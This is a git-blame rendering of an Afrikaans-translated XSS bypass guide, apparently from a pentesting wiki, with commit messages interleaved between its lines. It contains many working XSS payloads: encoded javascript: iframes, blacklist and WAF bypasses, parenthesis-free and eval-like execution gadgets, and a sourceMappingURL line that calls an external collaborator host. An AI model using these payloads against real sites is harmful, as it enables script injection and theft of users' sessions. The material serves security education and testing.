										
											2024-02-18 14:51:58 +00:00
+								**Ander verduisteringstreke**
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								_**In hierdie geval is die HTML-kodering en die Unicode-koderingstrik van die vorige afdeling ook geldig omdat jy binne 'n attribuut is.**_
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								```javascript
 								<a href="javascript:var a='&apos;-alert(1)-&apos;'">
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Verder is daar nog 'n **mooi truuk** vir hierdie gevalle: **Selfs as jou inset binne `javascript:...` URL-gekodeer is, sal dit URL-ontkodeer word voordat dit uitgevoer word.** Dus, as jy moet **ontsnapping** van die **string** gebruik deur 'n **enkellid** en jy sien dat **dit URL-gekodeer word**, onthou dat **dit nie saak maak nie,** dit sal tydens die **uitvoertyd** as 'n **enkellid** geïnterpreteer word.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								&apos;-alert(1)-&apos;
 								%27-alert(1)-%27
 								<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Merk op dat as jy probeer om **beide** `URLencode + HTMLencode` in enige volgorde te gebruik om die **payload** te kodeer, sal dit **nie werk nie**, maar jy kan hulle **binne die payload meng**.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								**Die gebruik van Hex en Octal kodeer met `javascript:`**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Jy kan **Hex** en **Octal kodeer** binne die `src` eienskap van `iframe` (ten minste) gebruik om **HTML-etikette te verklaar om JS uit te voer**:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//Encoded: <svg onload=alert(1)>
 								// This WORKS
 								<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
 								<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
 								//Encoded: alert(1)
 								// This doesn't work
 								<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
 								<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Omgekeerde tab nabbing
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<a target="_blank" rel="opener"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Indien jy enige URL kan inspuit in 'n willekeurige **`<a href=`** tag wat die **`target="_blank" en rel="opener"`** eienskappe bevat, kontroleer die **volgende bladsy om hierdie gedrag te benut**:
-												GitBook: [master] 456 pages modified
											
										
										
											2021-05-01 15:23:19 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="../reverse-tab-nabbing.md" %}
 								[reverse-tab-nabbing.md](../reverse-tab-nabbing.md)
 								{% endcontent-ref %}
-												GitBook: [master] 456 pages modified
											
										
										
											2021-05-01 15:23:19 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### op Gebeurtenishanterers Omgang
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Eerstens, kontroleer hierdie bladsy ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) vir nuttige **"on" gebeurtenishanterers**.\
 								In geval daar 'n swartlys is wat voorkom dat jy hierdie gebeurtenishanterers kan skep, kan jy die volgende omseilings probeer:
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								```javascript
 								<svg onload%09=alert(1)> //No safari
 								<svg %09onload=alert(1)>
 								<svg %09onload%20=alert(1)>
 								<svg onload%09%20%28%2c%3b=alert(1)>
 								//chars allowed between the onevent and the "="
 								IExplorer: %09 %0B %0C %020 %3B
 								Chrome: %09 %20 %28 %2C %3B
 								Safari: %2C %3B
 								Firefox: %09 %20 %28 %2C %3B
 								Opera: %09 %20 %2C %3B
 								Android: %09 %20 %28 %2C %3B
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### XSS in "Onuitbuitbare tages" (verborge invoer, skakel, kanonieke, meta)
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Vanaf [**hier**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **is dit nou moontlik om verborge invoere te misbruik met:**
-												GITBOOK-4016: change request with no subject merged in GitBook

											
										
										
											2023-07-28 11:44:45 +00:00
+								```html
 								<button popvertarget="x">Click me</button>
 								<input type="hidden" value="y" popover id="x" onbeforetoggle=alert(1)>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								En in **meta-tages**:
-												GITBOOK-4016: change request with no subject merged in GitBook

											
										
										
											2023-07-28 11:44:45 +00:00
+								```html
 								<!-- Injection inside meta attribute-->
 								<meta name="apple-mobile-web-app-title" content=""Twitter popover id="newsletter" onbeforetoggle=alert(2) />
 								<!-- Existing target-->
 								<button popovertarget="newsletter">Subscribe to newsletter</button>
 								<div popover id="newsletter">Newsletter popup</div>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Van [**hier**](https://portswigger.net/research/xss-in-hidden-input-fields): Jy kan 'n **XSS-lading binne 'n verborge atribuut** uitvoer, mits jy die **slagoffer** kan **oortuig** om die **sleutelkombinasie** te druk. Op Firefox Windows/Linux is die sleutelkombinasie **ALT+SHIFT+X** en op OS X is dit **CTRL+ALT+X**. Jy kan 'n ander sleutelkombinasie spesifiseer deur 'n ander sleutel in die toegangssleutel atribuut te gebruik. Hier is die vektor:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<input type="hidden" accesskey="X" onclick="alert(1)">
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Die XSS-lading sal iets soos hierdie wees: `" accesskey="x" onclick="alert(1)" x="`**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Swartlys Verbygaan
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Verskeie truuks met die gebruik van verskillende enkodering is reeds binne hierdie afdeling blootgestel. Gaan **terug om te leer waar jy kan gebruik:**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **HTML enkodering (HTML-etikette)**
 								* **Unicode enkodering (kan geldige JS-kode wees):** `\u0061lert(1)`
 								* **URL enkodering**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* **Heks en Oktale enkodering**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **data enkodering**
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Verbygaan vir HTML-etikette en eienskappe**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Lees die [Swartlys Verbygaan van die vorige afdeling](./#blacklist-bypasses).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Verbygaan vir JavaScript-kode**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Lees die [JavaScript-verbygaan swartlys van die volgende afdeling](./#javascript-bypass-blacklists-techniques).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3167] No subject

											
										
										
											2022-05-01 16:57:45 +00:00
+								### CSS-Gadgets
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy 'n **XSS in 'n baie klein deel** van die web gevind het wat 'n soort interaksie vereis (miskien 'n klein skakel in die voetnota met 'n onmouseover element), kan jy probeer om **die spasie wat daardie element inneem te wysig** om die kanse te maksimeer om die skakel te laat afgaan.
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Byvoorbeeld, jy kan bietjie styl by die element voeg soos: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Maar, as die WAF die styl-eienskap filter, kan jy CSS Styling Gadgets gebruik, so as jy byvoorbeeld vind
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								> .toets {display:block; color: blue; width: 100%\}
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								en
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
 								> \#someid {top: 0; font-family: Tahoma;}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Nou kan jy ons skakel wysig en dit na die vorm bring
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
+								> \<a href="" id=someid class=test onclick=alert() a="">
-												GitBook: [#3027] No subject

											
										
										
											2022-02-22 10:32:26 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Hierdie truuk is geneem van [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								## Ins spuit binne JavaScript-kode
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								In hierdie geval word jou **inset** binne die JS-kode van 'n `.js`-lêer of tussen `<script>...</script>`-etikette of tussen HTML-gebeurtenisse wat JS-kode kan uitvoer of tussen eienskappe wat die `javascript:`-protokol aanvaar, weerspieël.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Ontsnapping van die \<script>-etiket
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jou kode binne `<script> [...] var input = 'weerspieëlde data' [...] </script>` ingevoeg word, kan jy maklik die **ontsnapping van die sluiting van die `<script>`**-etiket:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								</script><img src=1 onerror=alert(document.domain)>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Merk op dat in hierdie voorbeeld ons selfs nie die enkelkwotasie gesluit het nie. Dit is omdat HTML-analise word eerste deur die webblaaier uitgevoer, wat die identifisering van bladsyelemente insluit, insluitend blokke van skrips. Die analise van JavaScript om die ingeslote skripte te verstaan en uit te voer, word eers daarna uitgevoer.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Binne JS-kode
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As `<>` gesaniteer word, kan jy steeds die string ontvlug waar jou inset geplaas is en arbitêre JS uitvoer. Dit is belangrik om JS-sintaks te regstel, want as daar enige foute is, sal die JS-kode nie uitgevoer word nie:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								'-alert(document.domain)-'
 								';alert(document.domain)//
 								\';alert(document.domain)//
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Sjabloonliterale \`\`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Om **strings** saam te stel, behalwe enkel en dubbele aanhalingstekens, aanvaar JS ook **backticks** **` `` `**. Dit staan bekend as sjabloonliterale omdat hulle toelaat om **ingeslote JS-uitdrukkings** te gebruik deur `${ ... }`-sintaksis.\
 								Dus, as jy vind dat jou inset binne 'n JS-string wat backticks gebruik, **weerspieël** word, kan jy die sintaksis `${ ... }` misbruik om **willekeurige JS-kode** uit te voer:
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Dit kan **misbruik** word deur:
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								```javascript
 								`${alert(1)}`
 								`${`${`${`${alert(1)}`}`}`}`
 								```
 								```````````````javascript
 								// This is valid JS code, because each time the function returns itself it's recalled with ``
 								function loop(){return loop}
 								loop``````````````
 								```````````````
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Geënkripteerde kode-uitvoering
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 17:27:53 +00:00
+								```markup
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<script>\u0061lert(1)</script>
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 15:00:45 +00:00
+								<svg><script>alert&lpar;'1'&rpar;
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 17:27:53 +00:00
+								<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>  <!-- The svg tags are neccesary
 								<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Unicode Encode JS uitvoering
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								```javascript
 								\u{61}lert(1)
 								\u0061lert(1)
 								\u{0061}lert(1)
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### JavaScript omseil swartlys tegnieke
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3143] No subject

											
										
										
											2022-04-28 23:27:22 +00:00
+								**Strings**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								"thisisastring"
 								'thisisastrig'
 								`thisisastring`
 								/thisisastring/ == "/thisisastring/"
 								/thisisastring/.source == "thisisastring"
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								"\h\e\l\l\o"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
 								"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
 								"\164\150\151\163\151\163\141\163\164\162\151\156\147"
 								"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
 								"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								"\a\l\ert\(1\)"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								atob("dGhpc2lzYXN0cmluZw==")
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-04 17:18:34 +00:00
+								eval(8680439..toString(30))(983801..toString(36))
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Spesiale ontsnappings**
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								```javascript
 								'\b' //backspace
 								'\f' //form feed
 								'\n' //new line
 								'\r' //carriage return
 								'\t' //tab
 								'\b' //backspace
 								'\f' //form feed
 								'\n' //new line
 								'\r' //carriage return
 								'\t' //tab
 								// Any other char escaped is just itself
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Spasie-vervanging binne JS-kode**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								<TAB>
 								/**/
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**JavaScript kommentaar (vanaf** [**JavaScript Kommentaar**](./#javascript-comments) **truc)**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//This is a 1 line comment
 								/* This is a multiline comment*/
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								<!--This is a 1line comment
 								#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
 								-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**JavaScript nuwe lyne (vanaf** [**JavaScript nuwe lyn**](./#javascript-new-lines) **truc)**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//Javascript interpret as new line these chars:
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								String.fromCharCode(10); alert('//\nalert(1)') //0x0a
 								String.fromCharCode(13); alert('//\ralert(1)') //0x0d
 								String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
 								String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**JavaScript spasies**
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								```javascript
 								log=[];
 								function funct(){}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								for(let i=0;i<=0x10ffff;i++){
 								try{
 								eval(`funct${String.fromCodePoint(i)}()`);
 								log.push(i);
 								}
 								catch(e){}
 								}
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								console.log(log)
 								//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
 								//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
 								<img/src/onerror=alert&#65279;(1)>
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Javascript binne 'n kommentaar**
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								```javascript
 								//If you can only inject inside a JS comment, you can still leak something
 								//If the user opens DevTools request to the indicated sourceMappingURL will be send
 								//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**JavaScript sonder hakies**
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								````javascript
 								// By setting location
 								window.location='javascript:alert\x281\x29'
 								x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// or any DOMXSS sink such as location=name
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
 								// Backtips
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// Backtips pass the string as an array of lenght 1
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								alert`1`
 								// Backtips + Tagged Templates + call/apply
 								eval`alert\x281\x29` // This won't work as it will just return the passed array
 								setTimeout`alert\x281\x29`
 								eval.call`${'alert\x281\x29'}`
 								eval.apply`${[`alert\x281\x29`]}`
 								[].sort.call`${alert}1337`
 								[].map.call`${eval}\\u{61}lert\x281337\x29`
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// To pass several arguments you can use
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								function btt(){
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								console.log(arguments);
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								}
 								btt`${'arg1'}${'arg2'}${'arg3'}`
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								//It's possible to construct a function and call it
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								Function`x${'alert(1337)'}x```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// .replace can use regexes and call a function if something is found
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
 								"a".replace.call`1${/./}${alert}`
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// This happened in the previous example
 								// Change "this" value of call to "1,"
 								// match anything with regex /./
 								// call alert with "1"
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// Using Reflect.apply to call any function with any argumnets
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
 								Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// Using Reflect.set to call set any value to a variable
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
 								// valueOf, toString
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// These operations are called when the object is used as a primitive
 								// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								valueOf=alert;window+''
 								toString=alert;window+''
 								// Error handler
 								window.onerror=eval;throw"=alert\x281\x29";
 								onerror=eval;throw"=alert\x281\x29";
 								<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
 								{onerror=eval}throw"=alert(1)" //No ";"
 								onerror=alert //No ";" using new line
 								throw 1337
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// Error handler + Special unicode separators
 								eval("onerror=\u2028alert\u2029throw 1337");
 								// Error handler + Comma separator
 								// The comma separator goes through the list and returns only the last element
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								var a = (1,2,3,4,5,6) // a = 6
 								throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
 								throw onerror=alert,1,1,1,1,1,1337
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// optional exception variables inside a catch clause.
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								try{throw onerror=alert}catch{throw 1}
 								// Has instance symbol
 								'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
 								'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								````
 								* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
 								* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Willekeurige funksie (alert) oproep**
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								````javascript
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								//Eval like functions
 								eval('ale'+'rt(1)')
 								setTimeout('ale'+'rt(2)');
 								setInterval('ale'+'rt(10)');
 								Function('ale'+'rt(10)')``;
 								[].constructor.constructor("alert(document.domain)")``
-												GitBook: [master] one page modified
											
										
										
											2021-06-07 22:45:34 +00:00
+								[]["constructor"]["constructor"]`$${alert()}```
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								import('data:text/javascript,alert(1)')
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
 								//General function executions
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								`` //Can be use as parenthesis
 								alert`document.cookie`
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								alert(document['cookie'])
 								with(document)alert(cookie)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								(alert)(1)
 								(alert(1))in"."
 								a=alert,a(1)
 								[1].find(alert)
 								window['alert'](0)
 								parent['alert'](1)
 								self['alert'](2)
